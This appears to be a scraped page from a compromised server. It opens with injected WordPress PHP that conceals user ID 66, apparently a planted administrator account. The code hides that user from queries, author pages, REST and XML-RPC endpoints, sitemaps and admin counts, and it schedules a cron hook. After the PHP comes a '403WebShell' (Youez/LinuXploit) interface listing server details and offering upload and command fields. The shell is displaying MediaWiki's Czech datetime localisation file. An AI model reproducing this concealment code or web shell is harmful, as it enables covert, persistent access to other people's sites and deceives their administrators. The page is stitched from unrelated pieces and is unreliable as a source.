add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/languages/i18n/datetime/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wiki/languages/i18n/datetime/cs.json
{
	"@metadata": {
		"authors": [
			"Asmen",
			"Li-sung",
			"Mormegil",
			"Patrik L.",
			"Polda18",
			"Walter Klosse",
			"לערי ריינהארט"
		]
	},
	"january": "leden",
	"february": "únor",
	"march": "březen",
	"april": "duben",
	"may_long": "květen",
	"june": "červen",
	"july": "červenec",
	"august": "srpen",
	"september": "září",
	"october": "říjen",
	"november": "listopad",
	"december": "prosinec",
	"january-gen": "ledna",
	"february-gen": "února",
	"march-gen": "března",
	"april-gen": "dubna",
	"may-gen": "května",
	"june-gen": "června",
	"july-gen": "července",
	"august-gen": "srpna",
	"september-gen": "září",
	"october-gen": "října",
	"november-gen": "listopadu",
	"december-gen": "prosince",
	"jan": "1.",
	"feb": "2.",
	"mar": "3.",
	"apr": "4.",
	"may": "5.",
	"jun": "6.",
	"jul": "7.",
	"aug": "8.",
	"sep": "9.",
	"oct": "10.",
	"nov": "11.",
	"dec": "12.",
	"monday": "pondělí",
	"tuesday": "úterý",
	"wednesday": "středa",
	"thursday": "čtvrtek",
	"friday": "pátek",
	"saturday": "sobota",
	"sunday": "neděle",
	"mon": "po",
	"tue": "út",
	"wed": "st",
	"thu": "čt",
	"fri": "pá",
	"sat": "so",
	"sun": "ne",
	"period-am": "dop.",
	"period-pm": "odp.",
	"timezone-local": "místní čas",
	"hebrew-calendar-m1": "tišri",
	"hebrew-calendar-m2": "chešvan",
	"hebrew-calendar-m3": "kislev",
	"hebrew-calendar-m4": "tevet",
	"hebrew-calendar-m5": "švat",
	"hebrew-calendar-m6": "adar",
	"hebrew-calendar-m6a": "adar I",
	"hebrew-calendar-m6b": "adar II",
	"hebrew-calendar-m7": "Nisan",
	"hebrew-calendar-m8": "ijar",
	"hebrew-calendar-m9": "sivan",
	"hebrew-calendar-m10": "tamuz",
	"hebrew-calendar-m11": "av",
	"hebrew-calendar-m12": "elul",
	"hebrew-calendar-m1-gen": "tišri",
	"hebrew-calendar-m2-gen": "chešvanu",
	"hebrew-calendar-m3-gen": "kislevu",
	"hebrew-calendar-m4-gen": "tevetu",
	"hebrew-calendar-m5-gen": "švatu",
	"hebrew-calendar-m6-gen": "adaru",
	"hebrew-calendar-m6a-gen": "adaru I",
	"hebrew-calendar-m6b-gen": "adaru II",
	"hebrew-calendar-m7-gen": "nisanu",
	"hebrew-calendar-m8-gen": "ijaru",
	"hebrew-calendar-m9-gen": "sivanu",
	"hebrew-calendar-m10-gen": "tamuzu",
	"hebrew-calendar-m11-gen": "avu",
	"hebrew-calendar-m12-gen": "elulu",
	"hijri-calendar-m1": "muharram",
	"hijri-calendar-m2": "safar",
	"hijri-calendar-m3": "rabí' al-avval",
	"hijri-calendar-m4": "rabí'ath-thání",
	"hijri-calendar-m5": "džumádá l-úlá",
	"hijri-calendar-m6": "džumádá l-áchira",
	"hijri-calendar-m7": "radžab",
	"hijri-calendar-m8": "ša'bán",
	"hijri-calendar-m9": "ramadán",
	"hijri-calendar-m10": "šauvál",
	"hijri-calendar-m11": "dhú l-ka'da",
	"hijri-calendar-m12": "dhú l-hidždža",
	"iranian-calendar-m1": "Farvardín",
	"iranian-calendar-m2": "Ordíbehešt",
	"iranian-calendar-m3": "Chordád",
	"iranian-calendar-m4": "Tír",
	"iranian-calendar-m5": "Mordád",
	"iranian-calendar-m6": "Šahrívár",
	"iranian-calendar-m9": "Ázár",
	"iranian-calendar-m10": "Dej",
	"iranian-calendar-m11": "Bahmán",
	"years": "{{PLURAL:$1|$1 rok|$1 roky|$1 let}}",
	"months": "{{PLURAL:$1|$1 měsíc|$1 měsíce|$1 měsíců}}",
	"weeks": "{{PLURAL:$1|$1 týden|$1 týdny|$1 týdnů}}",
	"days": "{{PLURAL:$1|$1 den|$1 dny|$1 dní}}",
	"hours": "{{PLURAL:$1|$1 hodina|$1 hodiny|$1 hodin}}",
	"minutes": "{{PLURAL:$1|$1 minuta|$1 minuty|$1 minut}}",
	"seconds": "{{PLURAL:$1|$1 sekunda|$1 sekundy|$1 sekund}}",
	"ago": "před $1",
	"duration-millennia": "$1 {{PLURAL:$1|tisíciletí}}",
	"duration-centuries": "$1 {{PLURAL:$1|století}}",
	"duration-decades": "$1 {{PLURAL:$1|dekáda|dekády|dekád}}",
	"duration-years": "$1 {{PLURAL:$1|rok|roky|let}}",
	"duration-months": "$1 {{PLURAL:$1|měsíc|měsíce|měsíců}}",
	"duration-weeks": "$1 {{PLURAL:$1|týden|týdny|týdnů}}",
	"duration-days": "$1 {{PLURAL:$1|den|dny|dní}}",
	"duration-hours": "$1 {{PLURAL:$1|hodina|hodiny|hodin}}",
	"duration-minutes": "$1 {{PLURAL:$1|minuta|minuty|minut}}",
	"duration-seconds": "$1 {{PLURAL:$1|sekunda|sekundy|sekund}}",
	"monday-at": "v pondělí v $1",
	"tuesday-at": "v úterý v $1",
	"wednesday-at": "ve středu v $1",
	"thursday-at": "ve čtvrtek v $1",
	"friday-at": "v pátek v $1",
	"saturday-at": "v sobotu v $1",
	"sunday-at": "v neděli v $1",
	"yesterday-at": "včera v $1",
	"hours-ago": "před $1 {{PLURAL:$1|hodinou|hodinami}}",
	"minutes-ago": "před $1 {{PLURAL:$1|minutou|minutami}}",
	"seconds-ago": "před $1 {{PLURAL:$1|sekundou|sekundami}}",
	"just-now": "právě teď"
}

Youez - 2016 - github.com/yon3zu
LinuXploit